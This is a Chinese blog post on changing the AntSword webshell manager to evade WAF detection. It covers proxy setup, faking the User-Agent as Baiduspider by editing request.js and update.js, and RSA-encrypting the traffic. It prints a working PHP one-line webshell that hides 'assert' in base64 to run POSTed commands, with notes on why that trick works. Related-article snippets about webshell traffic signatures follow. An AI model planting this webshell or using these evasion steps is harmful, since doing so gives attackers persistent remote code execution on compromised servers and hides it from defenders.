蚁剑去除流量特征

于 2021-08-04 16:28:09 发布 948 收藏 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/119386767
版权

        针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行这几部分的修改:

        1)开启蚁剑代理设置

        2)UA特征伪造

        3)RSA流量加密

1.开启蚁剑代理设置

PS:前提必须设置代理

2.UA特征伪造

1)修改前抓取数据包查看UA字段

2)本次设置成百度UA,也可设置成其他UA

Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

3)修改/modules/request.js文件

4)修改/modules/update.js文件

5)修改后再次抓取数据包进行查看,成功修改了UA字段

3.RSA流量加密

蚁剑从2.1开始支持了RSA加密算法,但是仅仅支持php

<?php $k=base64_decode('YXNzZXJ0'); $k($_POST['cmd']); ?>

注意这里YXNzZxJ0 base64解密为assert,eval不可以。因为eval属于语言构造器,在php中不能来回调,类似call_user_function()。

1)采用RSA加密,新建一个rsa编码器

2)进行RSA配置,将代码拷入公钥,生成对应私钥

3)连接马文件,编辑数据,选择刚刚设置的编码脚本

4)抓取数据包进行查看,数据进行了加密

chaojixiaojingang
关注
  • 1
    点赞
  • 4
    收藏
  • 打赏
    打赏
  • 0
    评论
哥斯拉burpsuite流量记录
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-25 859
解码器就是在响应中设置编码,这里测试的是查看
x1DecoderPlus:AntSword()全参数流量XOR和Base64加伪装WebShell
05-13
介绍 AntSword()全参数流量XOR+Base64,基于基础上进行改造,主要用来逃避一些流量检测。 使用 php、jsp、asp文件夹中会有单独的README文件,打开后可以看到具体的使用说明。 或者可以直接在github上点击进去也可以看到 版本 v2.1.10 更新 2021年4月27日 增加Asp支持(基础功能没问题,不排除会有Bug,欢迎提交issue。) 2021年2月28日 增加Jsp支持 2021年2月23日 增加WebShell伪装,增大XOR-Key值,加多一层Base64编码传输。
jspshell 一些JSP的工具
06-24
jspshell 一些JSP的工具 非常好用的JSP工具集
webshell连接工具流量特征
最新发布
wojiaoqwe的博客
01-17 32
本文仅当作记录使用,方便后期查找。
菜刀、冰蝎、、哥斯拉的流量特征
eternitymd的博客
04-29 1万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0])),(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
中国流量分析
UserNick157的博客
04-25 3129
中国流量分析 文章目录中国流量分析1.代理2.测试连接数据包:执行代码:执行结果:3.双击连接第一个数据包数据包:第二个数据包数据包:执行代码:response:4.打开文件夹数据包:5.打开文件数据包:执行代码:6.修改文件1.修改小文件数据包:执行代码:2.修改大文件7.wget文件数据包执行代码:8.删除文件数据包:执行代码:9.上传文件1.数据包:执行代码:10.打开终端数据包执行代码:与相关功能模块源码部分知识点1.测试连接部分2.删除文件3.命令执行 1.代理 有设置代理的功能,
菜刀,,冰蝎,哥斯拉的流量特征
qq_51550750的博客
07-04 1837
菜刀,,冰蝎,哥斯拉的流量特征
Webshell工具的流量特征分析(菜刀,,冰蝎,哥斯拉)
告白的博客
05-31 7040
0x00 前言 使用各种的shell工具获取到目标权限,即可进行数据操作,今天来简要分析一下目前常使用的各类shell管理工具的流量特诊,帮助蓝队同学在风险识别上快速初值 0x01 中国菜刀流量分析 0x02 ......
tomcat put方法任意写文件漏洞
weixin_48739941的博客
04-21 2550
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。 (2) docker-compose up -d 启动。 (3)访问:http://192.168.43.137:8080/ (4)burpsuite抓包。 (5)send to repeater,修改为PUT /l3yx.txt。 (6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。 ...
加密 WebShell 过杀软
悦分享
08-03 1532
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国推崇模块化的开发思想,遵循开源,就要开得漂亮的原则, 致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及 其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力!通俗的讲:中国与中国菜刀相比,界面更加美观、功能更加齐全,并且自定义的程度更高且开放源代码。...
一句话木马
07-03
一句话木马
渗透测试-流量加密之冰蝎&
热门推荐
Tr0e
11-08 1万+
文章目录前言 前言
常见WebShell客户端的流量特征及检测思路
合天网安学院
05-28 5041
01概述开始之前先明确什么是webshell客户端?先问个问题,什么是客户端,什么是服务端?很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果已经种了后门,...
流量分析
震山的博客
09-12 866
流量有何规则,也许看完这篇有所收获吧
特征性信息修改简单过WAF
Adminxe的博客
09-21 623
0x00 前言 针对于特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行 这几部分的修改。 0x01 修改位置 代理通道 UA特征伪造 RSA流量加密 0x02 具体操作 1.代理通道 代理通道设置(前提是必须有这个代理): 2.UA特征伪造 默认UA抓包: 主要修改的位置: /modules/request.js 这边主要是推荐百度UA,具体自己可以百度下其他UA,都可..
高级模块开发
悦分享
08-04 565
进行二次开发的一些技巧与经验。
的配置及流量分析
weixin_48776804的博客
05-27 589
安装
从入门到魔改【一】
buffedon的博客
12-25 976
从入门到魔改【一】一、明文通信二、密文通信三、自定义编解码source/core/php/index.jssource/core/php/base64.js自定义加密算法四、参考文章 连接地址 选用网卡 一、明文通信 特征 =%40ini_set set_time_limit 分析过程 以 HTTP 流的形式 打开数据包 在虚拟终端执行命令 如上图:返回包首部和尾部有填充字符,分别是 117dd7689896 和 d3f7440 。对应了请求包中的 echo 的输出内容 二、密文通信 特

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chaojixiaojingang

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值